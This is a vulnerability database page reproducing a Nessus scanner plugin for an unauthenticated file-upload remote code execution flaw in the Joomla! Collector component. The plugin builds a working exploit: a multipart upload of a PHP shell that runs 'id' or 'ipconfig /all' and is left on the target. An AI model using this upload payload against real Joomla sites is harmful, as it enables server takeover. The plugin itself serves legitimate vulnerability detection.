Lucene search
K

Collector Component for Joomla! File Upload RCE

🗓️ 05 Feb 2013 00:00:00Reported by TenableType 
nessus
 nessus
🔗 www.tenable.com👁 42 Views

The Collector Component for Joomla! File Upload RCE is affected by an RCE vulnerability due to improper file validation, allowing remote attackers to execute arbitrary PHP script

Refs
Code
SourceLink
nessuswww.nessus.org/u
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(64470);
  script_version("1.11");
  script_set_attribute(attribute:"plugin_modification_date", value:"2025/05/14");
  script_bugtraq_id(57464);
  script_xref(name:"EDB-ID", value:"24228");

  script_name(english:"Collector Component for Joomla! File Upload RCE");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by a
remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The Collector Component for Joomla! running on the remote web server
is affected by a remote code execution vulnerability in the
com_collector component due to improper sanitization or verification
of uploaded files before placing them in a user-accessible path. An
unauthenticated, remote attacker can exploit this issue, by uploading
and then making a direct request to a crafted file, to execute
arbitrary PHP script on the remote host, subject to the privileges of
the web server user ID.");
  # https://packetstormsecurity.com/files/119678/Joomla-Collector-Shell-Upload.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?4c52ed4b");
  script_set_attribute(attribute:"solution", value:
"Unknown at this time.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:U/RC:X");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2013/01/19");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/02/05");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:joomla:joomla\!");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_set_attribute(attribute:"enable_cgi_scanning", value:"true");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2013-2025 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("joomla_detect.nasl");
  script_require_keys("installed_sw/Joomla!", "www/PHP");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");

app = "Joomla!";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80, php:TRUE);

install = get_single_install(
  app_name : app,
  port     : port
);
dir = install['path'];
install_url =  build_url(port:port, qs:dir);

# Verify component is installed
plugin = "Collector";

# Check KB first
installed = get_kb_item("www/"+port+"/webapp_ext/"+plugin+" under "+dir);

if (!installed)
{
  checks = make_array();
  regexes = make_list();
  regexes[0] = make_list('collectorSelect');
  checks["/components/com_collector/assets/select.css"] = regexes;

  # Ensure plugin is installed
  installed = check_webapp_ext(
    checks : checks,
    dir    : dir,
    port   : port,
    ext    : plugin
  );
}
if (!installed) audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + " component");

# Determine which command to execute on target host
os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
  if ("Windows" >< os) cmd = 'ipconfig /all';
  else cmd = 'id';

  cmds = make_list(cmd);
}
else cmds = make_list('id', 'ipconfig /all');

cmd_pats = make_array();
cmd_pats['id'] = "uid=[0-9]+.*gid=[0-9]+.*";
cmd_pats['ipconfig /all'] = "Subnet Mask";

token = (SCRIPT_NAME - ".nasl") + "-" + unixtime() + ".php";
vuln = FALSE;
n = 0;

# Attempt our upload and code execution
foreach cmd (cmds)
{
  # Get path to the file uploaded for use in our reporting section
  if (cmd == 'id') upload_path = "system('pwd')";
  else upload_path = "system('dir "+ token +"')";

  # Add a digit to file name for each additional request as file overwrites
  # will not be allowed and result in an error.
  if (n > 0) token = token - ".php" + n + ".php";

  php_shell = '-----------------------------253112480323116\r\n' +
    'Content-Disposition: form-data; name="foldername"\r\n' + '\r\n' + '\r\n' +
    '-----------------------------253112480323116\r\n' +
    'Content-Disposition: form-data; name="fileupload"; filename="' + token +
    '"\r\n' +
    'Content-Type: text/plain\r\n' + '\r\n' +
    "<?php system('" +cmd+ "');" + upload_path + ";?>" + '\r\n' +
    '-----------------------------253112480323116\r\n' +
    'Content-Disposition: form-data; name="option"\r\n' +
    '\r\n' + 'com_collector\r\n' +
    '-----------------------------253112480323116\r\n' +
    'Content-Disposition: form-data; name="view"\r\n' +
    '\r\n' + 'filelist\r\n' +
    '-----------------------------253112480323116\r\n' +
    'Content-Disposition: form-data; name="tmpl"\r\n' +
    '\r\n' + 'component\r\n' +
    '-----------------------------253112480323116\r\n' +
    'Content-Disposition: form-data; name="task"\r\n' +
    '\r\n' + 'filemanager.upload\r\n' +
    '-----------------------------253112480323116\r\n' +
    'Content-Disposition: form-data; name="folder"\r\n' + '\r\n' + '\r\n' +
    '-----------------------------253112480323116--\r\n';

  #Attempt upload
  res2 = http_send_recv3(
    method    : "POST",
    item      : dir + "/index.php",
    data      : php_shell,
    add_headers:
      make_array("Content-Type",
    "multipart/form-data; boundary=---------------------------253112480323116"),
    port         : port,
    exit_on_fail : TRUE
  );
  exp_request = http_last_sent_request();

  # Try accessing the file we created
  res3 = http_send_recv3(
    method       : "GET",
    item         : dir + "/" + token,
    port         : port,
     exit_on_fail : TRUE
  );
  output = res3[2];

  if (egrep(pattern:cmd_pats[cmd], string:output))
  {
    vuln = TRUE;
    get_up_path = "" + token;

    # Extract path for reporting
    if (cmd == 'id')
    {
      line_limit = 2;
      get_path = strstr(output, "/");
      get_up_path = chomp(get_path) + "/" + token;
      output = strstr(output, "uid") - get_path;
    }
    else
    {
      line_limit = 10;
      get_path = strstr(output, "Volume in drive");
      output = strstr(output, "Windows IP") - get_path;
      get_dir = egrep(pattern:"Directory of (.+)", string:get_path);
      if(!isnull(get_dir))
         get_up_path = chomp((get_dir - " Directory of ")) + '\\' +
           (token - ".php" + "*.php");
    }
    break;
  }
  n++;
}

if (!vuln)
  audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin +" component");

security_report_v4(
  port        : port,
  severity    : SECURITY_HOLE,
  cmd         : cmd,
  line_limit  : line_limit,
  request     : make_list(exp_request, install_url + '/' + token),
  output      : chomp(output),
  rep_extra   : '\nNote: This file has not been removed by Nessus and will need'                + ' to be' +
                '\nmanually deleted (' + get_up_path + ').'
);
exit(0);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 May 2025 00:00Current
6.5Medium risk
Vulners AI Score6.5
42